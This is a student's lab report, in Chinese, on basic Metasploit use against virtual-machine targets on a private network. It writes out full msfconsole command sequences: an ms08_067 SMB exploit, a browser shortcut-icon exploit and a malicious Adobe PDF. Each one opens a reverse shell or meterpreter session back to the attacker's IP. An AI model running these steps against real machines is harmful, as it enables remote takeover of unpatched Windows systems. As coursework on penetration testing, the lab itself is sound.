用自己的话解释什么是exploit,payload,encode.
exploit:漏洞攻击,一个exploit程序肯定会触发系统的一个或多个漏洞,进而程序直接获取到目标系统的部分或所有权限。
payload:搞破坏的关键代码。
encode:保证payload不出现特定字符,避免被查杀。
任务一:一个主动攻击实践,如ms08_067。
任务二: 一个针对浏览器的攻击,如ms11_050。
任务三: 一个针对客户端的攻击,如Adobe。
任务四: 成功应用任何一个辅助模块。
靶机:Microsoft Windows 2000(192.168.1.218)
payload :generic/shell_reverse_tcp
==首先要把靶机和攻击者的连接方式都改为桥接!!==
msfconsole打开metasploit控制台use exploit/windows/smb/ms08_067_netapi 使用ms08_067漏洞攻击方式set payload generic/shell_reverse_tcp以shell反向tcp连接为有效载荷set RHOST 192.168.1.218ip为靶机的IPset LHOST 192.168.1.182ip为攻击者的IPset target 0设置目标,0为无差别攻击输入exploit开始攻击

靶机:Microsoft Windows XP SP3(English)
payload :windows/meterpreter/reverse_tcp
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader使用浏览器漏洞set payload windows/meterpreter/reverse_tcp 选择反向链接载荷set SRVHOST 192.168.1.182设置服务器IP(攻击者IP)set LHOST 192.168.1.182设置攻击者IPexploit开始攻击
http://192.168.1.182弹出如下窗口

输入sessions查看有多少主机被反向链接到攻击者和靶机对应的序号。
输入sessions -i 2控制靶机(-i后面的数即为靶机对应的序号)

靶机:Windows XP sp3(192.168.1.139)
use windows/fileformat/adobe_cooltype_sing使用漏洞set payload windows/meterpreter/reverse_tcp选择攻击载荷set LHOST 192.168.1.182 为攻击者IPset FILENAME 20165209.pdf设置生成pdf文件的文件名exploit 开始攻击
20165209.pdf复制到Windows XP中back退出当前模块use exploit/multi/handler 进入监听模块set payload windows/meterpreter/reverse_tcp选择攻击载荷set LHOST 192.168.1.182为攻击者IPexploit开始攻击20165209.pdf,攻击成功
靶机:
show auxiliary查看所有的辅助模块info scanner/steam/server_info查看模块信息,请求从服务器获取信息,扫描范围默认为10(从起始地址开始往后扫10个),端口固定为UDP端口27015。端口27015只是用作输入/输出的通信端口。
use scanner/steam/server_info使用漏洞set RHOSTS 192.168.1.180为起始IPexploit开始攻击

1 输入 /etc/init.d/postgresql?start 启动postgresql数据库;
Connected to msf. Connection type: postgresql.之后,再次输入armitage即可开启成功。实验最痛苦的就是明明和大家做的一样,但是我的就是无法攻击成功。通过实验掌握了msf的简单操作,始终牢记不懂就help,不知道是干什么的就info,看不懂就有道的宗旨,还是有些收获的,有些快乐。
觉得差的也不多,也就一个大神的距离吧。通过在网络上捕包反查IP,并且攻击。类似这种步骤中的功能,我目前只能在已知的情况下,进行强迫式攻击(就是硬生生让舍友拷一下)。
2018-2019-2 20165209 《网络对抗技术》Exp5:MSF基础应用
原文:https://www.cnblogs.com/tutu233/p/10742078.html